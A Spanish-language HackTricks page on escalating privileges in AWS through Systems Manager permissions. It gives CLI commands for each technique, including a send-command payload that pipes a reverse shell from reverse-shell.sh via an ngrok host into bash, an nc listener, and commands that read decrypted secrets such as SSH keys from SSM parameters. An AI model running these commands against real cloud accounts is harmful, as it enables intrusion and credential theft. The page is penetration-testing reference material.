AWS - SSM Privesc

Support HackTricks

SSM

Para más información sobre SSM, consulta:

ssm:SendCommand

Un atacante con el permiso ssm:SendCommand puede ejecutar comandos en instancias que ejecutan el Amazon SSM Agent y comprometer el IAM Role que se ejecuta dentro de él.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/4.tcp.ngrok.io:16084 | bash"

En caso de que estés utilizando esta técnica para escalar privilegios dentro de una instancia EC2 ya comprometida, podrías simplemente capturar el rev shell localmente con:

# If you are in the machine you can capture the reverseshel inside of it
nc -lvnp 4444 #Inside the EC2 instance
aws ssm send-command --instance-ids "$INSTANCE_ID" \
--document-name "AWS-RunShellScript" --output text \
--parameters commands="curl https://reverse-shell.sh/127.0.0.1:4444 | bash"

Impacto Potencial: Privesc directo a los roles IAM de EC2 adjuntos a instancias en ejecución con agentes SSM en funcionamiento.

ssm:StartSession

Un atacante con el permiso ssm:StartSession puede iniciar una sesión similar a SSH en instancias que ejecutan el agente Amazon SSM y comprometer el rol IAM que se ejecuta dentro de él.

# Check for configured instances
aws ssm describe-instance-information
aws ssm describe-sessions --state Active

# Send rev shell command
aws ssm start-session --target "$INSTANCE_ID"

Para iniciar una sesión, necesitas tener instalado el SessionManagerPlugin: https://docs.aws.amazon.com/systems-manager/latest/userguide/install-plugin-macos-overview.html

Impacto Potencial: Privesc directo a los roles IAM de EC2 adjuntos a instancias en ejecución con SSM Agents en funcionamiento.

Privesc a ECS

Cuando las tareas de ECS se ejecutan con ExecuteCommand habilitado, los usuarios con suficientes permisos pueden usar ecs execute-command para ejecutar un comando dentro del contenedor. Según la documentación, esto se hace creando un canal seguro entre el dispositivo que usas para iniciar el comando “exec” y el contenedor objetivo con SSM Session Manager. (Se necesita el SSM Session Manager Plugin para que esto funcione) Por lo tanto, los usuarios con ssm:StartSession podrán obtener un shell dentro de las tareas de ECS con esa opción habilitada simplemente ejecutando:

aws ssm start-session --target "ecs:CLUSTERNAME_TASKID_RUNTIMEID"

Impacto Potencial: Privesc directo a los roles ECSIAM adjuntos a tareas en ejecución con ExecuteCommand habilitado.

ssm:ResumeSession

Un atacante con el permiso ssm:ResumeSession puede re-iniciar una sesión similar a SSH en instancias que ejecutan el Agente SSM de Amazon con un estado de sesión SSM desconectado y comprometer el Rol IAM que se ejecuta dentro de él.

# Check for configured instances
aws ssm describe-sessions

# Get resume data (you will probably need to do something else with this info to connect)
aws ssm resume-session \
--session-id Mary-Major-07a16060613c408b5

Impacto Potencial: Privesc directo a los roles de IAM de EC2 adjuntos a instancias en ejecución con agentes SSM en ejecución y sesiones desconectadas.

ssm:DescribeParameters, (ssm:GetParameter | ssm:GetParameters)

Un atacante con los permisos mencionados podrá listar los parámetros SSM y leerlos en texto claro. En estos parámetros, a menudo se puede encontrar información sensible como claves SSH o claves API.

aws ssm describe-parameters
# Suppose that you found a parameter called "id_rsa"
aws ssm get-parameters --names id_rsa --with-decryption
aws ssm get-parameter --name id_rsa --with-decryption

Impacto Potencial: Encontrar información sensible dentro de los parámetros.

ssm:ListCommands

Un atacante con este permiso puede listar todos los comandos enviados y, con suerte, encontrar información sensible en ellos.

aws ssm list-commands

Impacto Potencial: Encontrar información sensible dentro de las líneas de comando.

ssm:GetCommandInvocation, (ssm:ListCommandInvocations | ssm:ListCommands)

Un atacante con estos permisos puede listar todos los comandos enviados y leer la salida generada, con la esperanza de encontrar información sensible en ella.

# You can use any of both options to get the command-id and instance id
aws ssm list-commands
aws ssm list-command-invocations

aws ssm get-command-invocation --command-id <cmd_id> --instance-id <i_id>

Impacto Potencial: Encontrar información sensible dentro de la salida de las líneas de comando.

Codebuild

También puedes usar SSM para acceder a un proyecto de codebuild que se está construyendo:

Apoya a HackTricks

Last updated